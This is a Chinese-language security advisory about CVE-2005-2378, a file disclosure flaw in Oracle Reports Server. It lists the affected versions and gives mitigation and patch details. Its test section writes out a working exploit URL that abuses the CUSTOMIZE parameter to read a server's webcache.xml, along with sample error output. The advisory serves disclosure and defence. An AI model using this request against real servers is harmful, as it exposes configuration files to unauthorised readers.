安全研究

安全漏洞
Oracle Reports Server XML文件泄露漏洞

发布日期:2005-07-20
更新日期:2006-01-18

受影响系统:
Oracle Reports 9i
Oracle Reports 6i 6.0.8.19
Oracle Reports 6i 6.0.8
Oracle Reports 6
Oracle Reports 10g 9.0.4.3.3
Oracle Reports 10g 9.0.4
Oracle Reports 10g 9.0.3
Oracle Reports 10g 9.0.2
Oracle Reports 10g 9.0.1
Oracle Reports 10g 9.0
描述:
BUGTRAQ  ID: 14311
CVE(CAN) ID: CVE-2005-2378

Oracle是一款大型的商业数据库系统,Oracle Reports是Oracle的一款企业报表工具。

Oracle Reports Server中存在文件泄漏漏洞,远程攻击者可能利用此漏洞读取部分文件内容。

起因是服务器在处理特制的HTTP GET命令时没有限制用户访问部分XML文件。攻击者可以利用绝对或相对文件名在Reports错误消息中显示部分文件内容。

<*来源:Alexander Kornbrust (ak@red-database-security.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112181242916757&w=2
        http://www.red-database-security.com/advisory/oracle_reports_read_any_xml_file.html
        http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html
        http://www.us-cert.gov/cas/techalerts/TA06-018A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://myserver:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=scott/tiger@iasdb+destype=cache+desformat=xml+CUSTOMIZE=/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml

***Reports输出****

REP--866648059: Error in the XML report definition at line 3 in
'
Element 'CALYPSO' used but not declared.'.

***Reports输出****

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 使用URLRewrite阻断可能的危险URL。

RewriteLog /anywhere/rewrite.log
RewriteEngine On
RewriteRule (.*)customize(.*)$ /forbidden.htm[R] [NC]

厂商补丁:

Oracle
------
Oracle已经为此发布了一个安全公告(cpujan2006)以及相应补丁:
cpujan2006:Oracle Critical Patch Update - January 2006
链接:http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html?_template=/ocom/technology/cont

浏览次数:3536
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障